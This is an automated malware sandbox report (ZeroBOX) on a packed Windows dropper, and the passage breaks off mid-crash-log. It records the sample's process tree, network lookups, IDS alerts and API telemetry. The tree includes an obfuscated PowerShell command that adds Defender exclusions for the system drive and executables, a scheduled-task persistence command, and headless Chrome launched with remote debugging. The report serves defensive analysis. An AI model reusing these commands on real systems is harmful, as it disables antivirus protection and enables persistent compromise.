Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	April 24, 2023, 8:52 a.m.	April 24, 2023, 8:59 a.m.

Size	6.7MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`75e3b5b17db31f0f3d44131fe28d44ff`
SHA256	`1846ce93adde1fe895875ceeb8e36f3a2444c7d5b180ccf53548687cc2ad6ff2`
CRC32	`2A747489`
ssdeep	`196608:VjWrYkSwV0rXV9oW80GHD4CNITUe4aves468n+SzloWl:Vrwq780GjFNIorsvun+Szx`
PDB Path	D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb
Yara	UPX_Zero - UPX packed file OS_Processor_Check_Zero - OS Processor Check IsPE32 - (no description) PE_Header_Zero - PE File Signature Malicious_Library_Zero - Malicious_Library

127.exe "C:\Users\test22\AppData\Local\Temp\127.exe"
2536
- 11.exe "C:\Windows\Temp\11.exe"
  2744
- 123.exe "C:\Windows\Temp\123.exe"
  2784
  - RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    2912
    - powershell.exe powershell "Start-Process <#xkagfzgnanuo#> powershell <#xkagfzgnanuo#> -Verb <#xkagfzgnanuo#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'
      2236
      - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force
        1852
    - schtasks.exe schtasks /create /sc daily /st 12:00 /f /tn "RegSvcs" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      3012
- 321.exe "C:\Windows\Temp\321.exe"
  2824
  - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --remote-debugging-port=34041 --headless --user-data-dir="C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ" --profile-directory="Default"
    604
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x90,0x94,0x98,0x8c,0x9c,0x7fef42df1e8,0x7fef42df1f8,0x7fef42df208
      1404
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=812 --on-initialized-event-handle=312 --parent-handle=316 /prefetch:6
      152
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\test22\AppData\Local\Temp --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod= --annotation=ver= --initial-client-data=0x154,0x158,0x15c,0x150,0x160,0x7fef3fc7218,0x7fef3fc7228,0x7fef3fc7238
      2212

Name	Response	Post-Analysis Lookup
pastebin.com	A 104.20.67.143 A 172.67.34.170 A 104.20.68.143	104.20.67.143
ip-api.com	A 208.95.112.1	208.95.112.1

IP Address	Status	Action
104.20.67.143	Active	Moloch
164.124.101.2	Active	Moloch
178.32.215.165	Active	Moloch
185.159.130.81	Active	Moloch
208.95.112.1	Active	Moloch
46.173.218.172	Active	Moloch
84.252.73.140	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49168 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49247 -> 104.20.67.143:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49247 104.20.67.143:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	79:b7:9c:ec:8a:be:ea:82:0d:16:04:fb:46:5f:89:6b:78:b9:43:fd

Queries for the computername (26 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 24, 2023, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2023, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2023, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2023, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2023, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2023, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2023, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2023, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2023, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2023, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2023, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2023, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2023, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2023, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2023, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2023, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2023, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 24, 2023, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2023, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2023, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2023, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2023, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2023, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2023, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 24, 2023, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2023, 8:52 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (34 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 24, 2023, 8:52 a.m.			0	0
IsDebuggerPresent April 24, 2023, 8:52 a.m.			0	0
IsDebuggerPresent April 24, 2023, 8:52 a.m.			0	0
IsDebuggerPresent April 24, 2023, 8:52 a.m.			0	0
IsDebuggerPresent April 24, 2023, 8:45 a.m.			0	0
IsDebuggerPresent April 24, 2023, 8:45 a.m.			0	0
IsDebuggerPresent April 24, 2023, 8:45 a.m.			0	0
IsDebuggerPresent April 24, 2023, 8:45 a.m.			0	0
IsDebuggerPresent April 24, 2023, 8:45 a.m.			0	0
IsDebuggerPresent April 24, 2023, 8:45 a.m.			0	0
IsDebuggerPresent April 24, 2023, 8:45 a.m.			0	0
IsDebuggerPresent April 24, 2023, 8:45 a.m.			0	0
IsDebuggerPresent April 24, 2023, 8:45 a.m.			0	0
IsDebuggerPresent April 24, 2023, 8:45 a.m.			0	0
IsDebuggerPresent April 24, 2023, 8:45 a.m.			0	0
IsDebuggerPresent April 24, 2023, 8:45 a.m.			0	0
IsDebuggerPresent April 24, 2023, 8:45 a.m.			0	0
IsDebuggerPresent April 24, 2023, 8:45 a.m.			0	0
IsDebuggerPresent April 24, 2023, 8:45 a.m.			0	0
IsDebuggerPresent April 24, 2023, 8:45 a.m.			0	0
IsDebuggerPresent April 24, 2023, 8:45 a.m.			0	0
IsDebuggerPresent April 24, 2023, 8:45 a.m.			0	0
IsDebuggerPresent April 24, 2023, 8:45 a.m.			0	0
IsDebuggerPresent April 24, 2023, 8:45 a.m.			0	0
IsDebuggerPresent April 24, 2023, 8:45 a.m.			0	0
IsDebuggerPresent April 24, 2023, 8:45 a.m.			0	0
IsDebuggerPresent April 24, 2023, 8:45 a.m.			0	0
IsDebuggerPresent April 24, 2023, 8:45 a.m.			0	0
IsDebuggerPresent April 24, 2023, 8:45 a.m.			0	0
IsDebuggerPresent April 24, 2023, 8:45 a.m.			0	0
IsDebuggerPresent April 24, 2023, 8:45 a.m.			0	0
IsDebuggerPresent April 24, 2023, 8:45 a.m.			0	0
IsDebuggerPresent April 24, 2023, 8:52 a.m.			0	0
IsDebuggerPresent April 24, 2023, 8:52 a.m.			0	0

Command line console output was observed (10 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 24, 2023, 8:52 a.m.	buffer: SUCCESS: The scheduled task "RegSvcs" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW April 24, 2023, 8:53 a.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW April 24, 2023, 8:53 a.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW April 24, 2023, 8:53 a.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW April 24, 2023, 8:53 a.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW April 24, 2023, 8:53 a.m.	buffer: + Add-MpPreference <<<< -ExclusionPath $env:SystemDrive -ExclusionExtension .e console_handle: 0x00000053	1	1
WriteConsoleW April 24, 2023, 8:53 a.m.	buffer: xe, .dll -Force console_handle: 0x0000005f	1	1
WriteConsoleW April 24, 2023, 8:53 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x0000006b	1	1
WriteConsoleW April 24, 2023, 8:53 a.m.	buffer: mmandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW April 24, 2023, 8:53 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000083	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 109 events)

Time & API	Arguments	Status	Return
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005705e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005705e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005705e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005705e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00570668 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00570668 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00570568 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00570568 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00570568 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00570568 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00570568 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005705e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005705e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005707e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005710a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005710a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00570f68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007f7520 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007f7520 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007f7460 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007f7ee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007f7ee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007f7f60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00550038 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005505f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005505f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005505f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00550938 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00550938 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00550938 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00550938 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00550938 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00550938 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005504b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005504b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005504b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005505f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005505f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005505f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005500f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005505f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005505f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005505f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005505f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005505f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005505f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005505f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0054fcb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0054fcb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2023, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0054fcb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb

Tries to locate where the browsers are installed (3 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\firefox.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 24, 2023, 8:52 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.gfids

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

PNG

One or more processes crashed (50 out of 138 events)

Time & API	Arguments	Status
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: 11+0x9077eb @ 0x12c77eb 11+0x900fd4 @ 0x12c0fd4 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc e9 55 c9 5d 8b 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xc000008e exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 1833632 registers.edi: 15515648 registers.eax: 1833632 registers.ebp: 1833712 registers.edx: 2130566132 registers.ebx: 32 registers.esi: 1995994155 registers.ecx: 1633353728	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: exception.instruction_r: ed e9 51 10 01 00 c3 e9 20 96 fd ff b1 56 92 55 exception.symbol: 11+0x9355e5 exception.instruction: in eax, dx exception.module: 11.exe exception.exception_code: 0xc0000096 exception.offset: 9655781 exception.address: 0x12f55e5 registers.esp: 1833752 registers.edi: 17120201 registers.eax: 1750617430 registers.ebp: 15515648 registers.edx: 22614 registers.ebx: 10223616 registers.esi: 3588360 registers.ecx: 20	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: exception.instruction_r: ed e9 85 cc 00 00 f0 14 0f 86 3d d0 8c c2 2e 00 exception.symbol: 11+0x938c31 exception.instruction: in eax, dx exception.module: 11.exe exception.exception_code: 0xc0000096 exception.offset: 9669681 exception.address: 0x12f8c31 registers.esp: 1833752 registers.edi: 17120201 registers.eax: 1447909480 registers.ebp: 15515648 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 3588360 registers.ecx: 10	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: 0x979641 0x979443 0x977658 0x976e53 0x973c08 0x9735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x722f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7230264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72302e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x723b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72441dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72441e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72441f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7244416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7386f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72997f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72994de3 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x979778 registers.esp: 1829896 registers.edi: 1829948 registers.eax: 0 registers.ebp: 1829960 registers.edx: 5797328 registers.ebx: 1831188 registers.esi: 54680556 registers.ecx: 0	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: 0x5384021 0x5383e82 0x5383d55 0x538260b 0x53817a1 0x97d567 0x97779d 0x976e53 0x973c08 0x9735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x722f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7230264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72302e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x723b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72441dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72441e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72441f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7244416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7386f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72997f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72994de3 exception.instruction_r: 39 09 ff 15 58 a9 11 03 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5384c62 registers.esp: 1828136 registers.edi: 1828436 registers.eax: 0 registers.ebp: 1828448 registers.edx: 51488572 registers.ebx: 1831188 registers.esi: 55452048 registers.ecx: 0	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: 0x5388590 0x53845ec 0x5383e82 0x5383d55 0x538260b 0x53817a1 0x97d567 0x97779d 0x976e53 0x973c08 0x9735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x722f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7230264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72302e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x723b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72441dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72441e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72441f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7244416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7386f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72997f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72994de3 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x53885d3 registers.esp: 1828424 registers.edi: 1828768 registers.eax: 0 registers.ebp: 1828432 registers.edx: 0 registers.ebx: 1831188 registers.esi: 55452048 registers.ecx: 56701632	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: 0x5384021 0x5383e82 0x5383d6d 0x538260b 0x53817a1 0x97d567 0x97779d 0x976e53 0x973c08 0x9735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x722f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7230264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72302e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x723b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72441dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72441e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72441f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7244416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7386f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72997f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72994de3 exception.instruction_r: 39 09 ff 15 58 a9 11 03 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5384c62 registers.esp: 1828136 registers.edi: 1828436 registers.eax: 0 registers.ebp: 1828448 registers.edx: 51488572 registers.ebx: 1831188 registers.esi: 55452048 registers.ecx: 0	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: 0x5388590 0x53845ec 0x5383e82 0x5383d6d 0x538260b 0x53817a1 0x97d567 0x97779d 0x976e53 0x973c08 0x9735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x722f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7230264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72302e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x723b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72441dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72441e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72441f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 